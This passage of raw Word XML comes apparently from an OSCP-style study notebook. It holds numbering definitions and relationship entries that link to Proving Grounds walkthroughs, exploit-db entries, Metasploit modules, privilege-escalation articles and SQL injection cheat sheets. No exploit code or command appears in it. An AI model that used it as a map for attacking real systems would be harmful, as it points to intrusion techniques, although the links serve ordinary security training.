  <w:num w:numId="1461">
    <w:abstractNumId w:val="1461"/>
  </w:num>
  <w:num w:numId="1462">
    <w:abstractNumId w:val="1462"/>
  </w:num>
  <w:num w:numId="1463">
    <w:abstractNumId w:val="1463"/>
  </w:num>
  <w:num w:numId="1464">
    <w:abstractNumId w:val="1464"/>
  </w:num>
  <w:num w:numId="1465">
    <w:abstractNumId w:val="1465"/>
  </w:num>
  <w:num w:numId="1466">
    <w:abstractNumId w:val="1466"/>
  </w:num>
  <w:num w:numId="1467">
    <w:abstractNumId w:val="1467"/>
  </w:num>
  <w:num w:numId="1468">
    <w:abstractNumId w:val="1468"/>
  </w:num>
  <w:num w:numId="1469">
    <w:abstractNumId w:val="1469"/>
  </w:num>
  <w:num w:numId="1470">
    <w:abstractNumId w:val="1470"/>
  </w:num>
  <w:num w:numId="1471">
    <w:abstractNumId w:val="1471"/>
  </w:num>
  <w:num w:numId="1472">
    <w:abstractNumId w:val="1472"/>
  </w:num>
  <w:num w:numId="1473">
    <w:abstractNumId w:val="1473"/>
  </w:num>
  <w:num w:numId="1474">
    <w:abstractNumId w:val="1474"/>
  </w:num>
  <w:num w:numId="1475">
    <w:abstractNumId w:val="1475"/>
  </w:num>
  <w:num w:numId="1476">
    <w:abstractNumId w:val="1476"/>
  </w:num>
  <w:num w:numId="1477">
    <w:abstractNumId w:val="1477"/>
  </w:num>
  <w:num w:numId="1478">
    <w:abstractNumId w:val="1478"/>
  </w:num>
  <w:num w:numId="1479">
    <w:abstractNumId w:val="1479"/>
  </w:num>
  <w:num w:numId="1480">
    <w:abstractNumId w:val="1480"/>
  </w:num>
  <w:num w:numId="1481">
    <w:abstractNumId w:val="1481"/>
  </w:num>
  <w:num w:numId="1482">
    <w:abstractNumId w:val="1482"/>
  </w:num>
  <w:num w:numId="1483">
    <w:abstractNumId w:val="1483"/>
  </w:num>
  <w:num w:numId="1484">
    <w:abstractNumId w:val="1484"/>
  </w:num>
  <w:num w:numId="1485">
    <w:abstractNumId w:val="1485"/>
  </w:num>
  <w:num w:numId="1486">
    <w:abstractNumId w:val="1486"/>
  </w:num>
  <w:num w:numId="1487">
    <w:abstractNumId w:val="1487"/>
  </w:num>
  <w:num w:numId="1488">
    <w:abstractNumId w:val="1488"/>
  </w:num>
  <w:num w:numId="1489">
    <w:abstractNumId w:val="14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290.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image500.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image466.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image465.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image459.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image326.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image386.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image318.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nicocha30/ligolo-ng/releases" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0x47M4D/double-pivoting-using-ligolo-ng-3b4094363ff2" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image361.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image383.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image422.png"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mzet-/linux-exploit-suggester" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e9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379.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image490.png"/><Relationship Id="rId1090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=3870s" TargetMode="External"/><Relationship Id="rId1091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secybr.com/posts/snmp-pentesting-best-practicies/" TargetMode="External"/><Relationship Id="rId1092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image497.png"/><Relationship Id="rId1093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId1094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image553.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1uGWJFO00S8ZlXMCpm57INavfAvW3IWYqyKEq3aUvXXI/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId1095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image274.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-medjed-7570cbbea087" TargetMode="External"/><Relationship Id="rId1096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image357.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-authby-96e74b36375a" TargetMode="External"/><Relationship Id="rId1097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt" TargetMode="External"/><Relationship Id="rId1098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.duplichecker.com/hex-to-text.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId1099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image348.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image524.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image337.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-authby-7d0391b0897c" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image313.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image391.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt" TargetMode="External"/><Relationship Id="rId1080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId1081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image504.png"/><Relationship Id="rId1082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId1083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NT_LAN_Manager" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image506.png"/><Relationship Id="rId1084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-clamav-proving-ground-practice-943bb3dd5a99" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/LAN_Manager" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId1085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image349.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/LAN_Manager" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId1086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-21-proving-grounds-clamav-774a396d568b" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId1087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4761" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId1088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-clamav-proving-ground-practice-943bb3dd5a99" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image538.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image341.png"/><Relationship Id="rId1089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=vSnB0AZDvjM&amp;t=590s" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image420.png"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NT_LAN_Manager" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesting.zeyu2001.com/proving-grounds/get-to-work/medjed?source=post_page-----09adfeceaa74---------------------------------------" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image394.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image347.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/msf-overview/#Datastore" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/msf-overview/#Datastore" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.ubuntu.com/manpages/xenial/en/man1/mousepad.1.html" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.ubuntu.com/manpages/xenial/en/man1/mousepad.1.html" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ruby-lang.org/en/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image447.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image311.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/audit/unix-privesc-check" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/audit/unix-privesc-check" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image388.png"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image415.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ruby-lang.org/en/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image321.png"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/handler/" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/handler/" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image427.png"/><Relationship Id="rId808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image295.png"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image464.png"/><Relationship Id="rId805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image529.png"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.png"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image338.png"/><Relationship Id="rId804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image496.png"/><Relationship Id="rId803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sanaullahamankorai.medium.com/funbox-walkthrough-proving-grounds-play-5cd185a2f3f0" TargetMode="External"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.png"/><Relationship Id="rId801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://w3bspl01t3r.medium.com/xposedapi-35efbe1fc2c1" TargetMode="External"/><Relationship Id="rId1334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-32-proving-grounds-marketing-bf040837eeff" TargetMode="External"/><Relationship Id="rId1335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Y1LD1R1M-1337/Limesurvey-RCE?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId1336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49876" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image469.png"/><Relationship Id="rId1338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://al1z4deh.medium.com/proving-grounds-fanatastic-b14a6e535e1f" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.png"/><Relationship Id="rId1339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-fanatastic-792d7014d7a0" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice#basic-union-attack" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-insanity-hosting-walkthrough-f036b27fcca9" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/" TargetMode="External"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image358.png"/><Relationship Id="rId987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image554.png"/><Relationship Id="rId744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image505.png"/><Relationship Id="rId743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hughbrown123/walk-through-vulnhub-empire-breakout-362e240013d3" TargetMode="External"/><Relationship Id="rId985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image310.png"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.png"/><Relationship Id="rId742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sosimple-53-100-21453c1ef208" TargetMode="External"/><Relationship Id="rId984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image396.png"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image314.png"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection#what-is-sql-injection-sqli" TargetMode="External"/><Relationship Id="rId748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html?highlight=SQL%20inject#what-is-sql-injection" TargetMode="External"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image389.png"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=1nJgupaUPEQ" TargetMode="External"/><Relationship Id="rId746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hughbrown123/walk-through-vulnhub-empire-breakout-362e240013d3" TargetMode="External"/><Relationship Id="rId988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image400.png"/><Relationship Id="rId741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.png"/><Relationship Id="rId983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-loly-d8724b4466a3" TargetMode="External"/><Relationship Id="rId1330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49788" TargetMode="External"/><Relationship Id="rId740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec-fortress.github.io/posts/pg/posts/Shenzi.html" TargetMode="External"/><Relationship Id="rId1331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-44-proving-grounds-bullybox-bc2918d6cbd6" TargetMode="External"/><Relationship Id="rId981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image262.png"/><Relationship Id="rId1332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xk4b1r/CVE-2022-3552" TargetMode="External"/><Relationship Id="rId980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId1333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@diogo.g.c/pg-ctf-200-06-walkthrough-guide-f8c6f55c4588" TargetMode="External"/><Relationship Id="rId1323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49359?source=post_page-----834e61a9fc03---------------------------------------" TargetMode="External"/><Relationship Id="rId1324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45987?source=post_page-----834e61a9fc03---------------------------------------" TargetMode="External"/><Relationship Id="rId31" 